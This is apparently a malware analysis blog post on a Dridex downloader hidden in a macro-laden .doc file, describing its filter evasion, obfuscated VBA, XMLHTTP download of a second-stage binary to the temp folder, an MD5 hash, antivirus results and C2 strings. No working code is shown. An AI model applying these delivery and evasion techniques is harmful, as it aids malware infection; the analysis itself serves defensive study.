Dridex Downloader

Recently we have been hearing of the rise of VB macro based downloaders and other kind of malware as the first stage of the multi stage attack. FireEye in the blog post mentioned use of macro based documents as IIV (Initial Infection Vector) for banking trojans like Dridex.

This time the malicious document file is of extension .doc
and not .docm (the compressed newer version of Word files with embedded macros). Instead of using docm, doc extension is used
most probably to get through file filters on email security gateway, whereby macro
extensions might be blocked.

The file does not contain any text and a lot of unused code
is found in the VBA macro, which is both irrelevant and most probably placed in
there for the purpose of anti-analysis. The actual malicious code which is used
as a downloader is obfuscated.

Similar techniques are deployed and Object used to download in temp folder and run the malicious binary.

.

Microsoft.XMLHTTP object is used to send a GET request to the malicious website for downloading the second stage binary.

This the de-obfuscated GET request and we can see the URL to
the second stage binary.

The second stage binary is copied to the temp folder named
as ruebfo.exe

The second stage binary was downloaded and its MD5 hash is
found to be: e476dc4261c3848a06cc2cc62195dd55

Scanning the file with McAfee didn’t yield any detections,
but Malwarebytes was able to detect the binary as Backdoor.Bot

Strangely McAfee also detects the file as a generic packed
but when we scanned the binary by Mcafee AV it was not able to detect anything.

The file is shown as not packed by Exeinfo. However we are
not able to find any useful strings when we try to extract strings out of the
file.

A dynamic behavior analysis
of the binary shows some interesting strings and behavior. The process hacker
utility can be used to extract strings from the running binary (from memory) and some interesting
strings can be seen below.

We can see the IP address and port of the C2 Server
which is used to establish a TCP conn. We can also see the HTTP POST request
method, which could be used for range of things ranging from providing the
result of C2 commands to the C2 server, to data exfiltration. We could also see
the cryptnet.dll, indicating that main part of the code could be encrypted.